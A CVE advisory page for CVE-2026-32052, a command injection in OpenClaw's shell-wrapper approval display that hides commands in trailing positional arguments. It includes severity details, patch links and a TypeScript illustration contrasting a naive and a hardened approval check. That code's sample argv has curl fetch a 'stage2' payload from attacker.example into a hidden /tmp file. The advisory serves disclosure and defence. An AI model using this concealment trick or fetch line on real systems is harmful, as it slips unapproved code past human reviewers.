CVE-2026-32052

Severity: Medium (CVSS 4.0 base score 5.8)
EPSS: 55.5%
Published Mar 21, 2026 · Last Modified Jun 17, 2026

Description

OpenClaw versions prior to 2026.2.24 contain a command injection vulnerability (CWE-77) in the system.run shell wrapper. The approval text shown to the user is derived from the inline shell payload, but positional argv carriers placed after that payload are not covered by the display-context validation. An attacker can therefore present benign-looking approval text while the trailing positional arguments carry the commands that actually execute.
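As an added illustration of the class of bug described above (this is not OpenClaw's code, nor code from the advisory; the function names, the parsing rules and the sample argv are assumptions built from the description): the TypeScript below models an approval display that summarizes a `sh -c` invocation by its inline script, shows what the shell actually binds to `$0`, `$1`, ... from the trailing arguments, and contrasts it with a hardened check that refuses any positional argv after the inline script.

```typescript
// Added example, not OpenClaw's code: a model of a shell-wrapper approval check,
// showing how positional argv placed after an inline "-c" payload carry a command
// that a display built from the payload alone never shows. Names, parsing rules
// and the sample argv are assumptions for illustration.

const SHELL_WRAPPERS = new Set(["sh", "bash", "dash", "zsh", "ksh"]);

// "-c" or an option cluster containing it, e.g. "-lc", "-ec" (simplification).
const INLINE_FLAG = /^-[A-Za-z]*c[A-Za-z]*$/;

interface WrapperInvocation {
  shell: string;
  script: string;        // the inline payload the user is shown
  positionals: string[]; // everything after it; the shell binds these to $0, $1, ...
}

// Parse "<shell> -c <script> [arg0 arg1 ...]"; null when argv is not that shape.
function parseShellWrapper(argv: string[]): WrapperInvocation | null {
  const base = argv[0]?.split("/").pop() ?? "";
  if (argv.length < 3 || !SHELL_WRAPPERS.has(base)) return null;
  const flagIdx = argv.findIndex((a, i) => i > 0 && INLINE_FLAG.test(a));
  if (flagIdx === -1 || flagIdx + 1 >= argv.length) return null;
  return { shell: base, script: argv[flagIdx + 1], positionals: argv.slice(flagIdx + 2) };
}

// Vulnerable pattern: the approval text is the inline script and nothing else.
function naiveApprovalText(argv: string[]): string {
  const inv = parseShellWrapper(argv);
  return inv ? inv.script : argv.join(" ");
}

// What POSIX "sh -c script arg0 arg1 ..." binds: arg0 -> $0, arg1 -> $1, ...
function positionalBindings(argv: string[]): Record<string, string> {
  const out: Record<string, string> = {};
  parseShellWrapper(argv)?.positionals.forEach((v, i) => { out[`$${i}`] = v; });
  return out;
}

// Heuristic: does the script read positional parameters ($0..$9, ${n}, $@, $*, $#)?
// Conservative: it also fires on a literal such as "$100", which is acceptable here.
function referencesPositionals(script: string): boolean {
  return /\$(\{?\d+\}?|[@*#])/.test(script);
}

interface Verdict { allowed: boolean; display: string; reason: string }

// Hardened rule: show the whole argv, and refuse when anything follows the inline
// script or when the script reads positional parameters at all.
function hardenedVerdict(argv: string[]): Verdict {
  const display = argv.map((a) => (/[\s"'$]/.test(a) ? JSON.stringify(a) : a)).join(" ");
  const inv = parseShellWrapper(argv);
  if (!inv) return { allowed: true, display, reason: "not an inline shell-wrapper call" };
  if (inv.positionals.length > 0) {
    const n = inv.positionals.length;
    return { allowed: false, display,
      reason: `${n} positional argv after the inline script would become $0..$${n - 1}` };
  }
  if (referencesPositionals(inv.script)) {
    return { allowed: false, display, reason: "inline script reads positional parameters" };
  }
  return { allowed: true, display, reason: "inline script only" };
}

// Constructed sample: the payload reads as a status message; "$0" "$@" is filled
// from the trailing positionals, which is where the real command lives.
const SAMPLE_ARGV = [
  "sh", "-c", 'echo "Refreshing workspace index"; "$0" "$@"',
  "curl", "-s", "http://attacker.example/stage2", "-o", "/tmp/.stage2",
];

console.log("naive display :", naiveApprovalText(SAMPLE_ARGV));
console.log("shell binds   :", positionalBindings(SAMPLE_ARGV));
console.log("hardened      :", hardenedVerdict(SAMPLE_ARGV));
```

The naive display prints only the inline script, so the reviewer sees an echo followed by `"$0" "$@"` and nothing about `curl`; the shell binds `$0` to `curl` and `$1..$4` to its arguments and runs them. The hardened verdict renders the full argv and refuses whenever positional carriers follow the script, which is the cheapest way to close this class of display/interpreter mismatch; rejecting scripts that read positional parameters at all is a stricter, optional second rule.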

CVSS Details

Base Score: 5.8 (CVSS 4.0, Medium)
Vector string:
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector: Network (AV:N)
Attack Complexity: High (AC:H)
Attack Requirements: None (AT:N)
Privileges Required: Low (PR:L)
User Interaction: Active (UI:A)
Vulnerable System Impact: Confidentiality None, Integrity High, Availability High (VC:N/VI:H/VA:H)
Subsequent System Impact: None (SC:N/SI:N/SA:N)
Threat, environmental and supplemental metrics: Not Defined (X)

Threat Intelligence

EPSS: 55.5% percentile
Exploit status: No known exploit
Patch status: Patch available

Weaknesses 2

CWE-436 Interpretation Conflict (the approval display and the invoked shell interpret the same argv differently)
CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')

Affected Products 1

Vendor    Product   Version   Range
openclaw  openclaw  *         < 2026.2.24

References 4

  • github.com https://github.com/openclaw/openclaw/commit/0f0a680d3df81739ea5088a2f88e65f938b7936b
    Patch
  • github.com https://github.com/openclaw/openclaw/commit/55cf92578d266987e390c4bf688196af98eac748
    Patch
  • github.com https://github.com/openclaw/openclaw/security/advisories/GHSA-6rcp-vxwf-3mfp
    Vendor Advisory
  • vulncheck.com https://www.vulncheck.com/advisories/openclaw-hidden-command-execution-via-shell-wrapper-positional-argv-carriers
    Third Party Advisory

Remediation

  • github.com https://github.com/openclaw/openclaw/commit/0f0a680d3df81739ea5088a2f88e65f938b7936b
    Patch
  • github.com https://github.com/openclaw/openclaw/commit/55cf92578d266987e390c4bf688196af98eac748
    Patch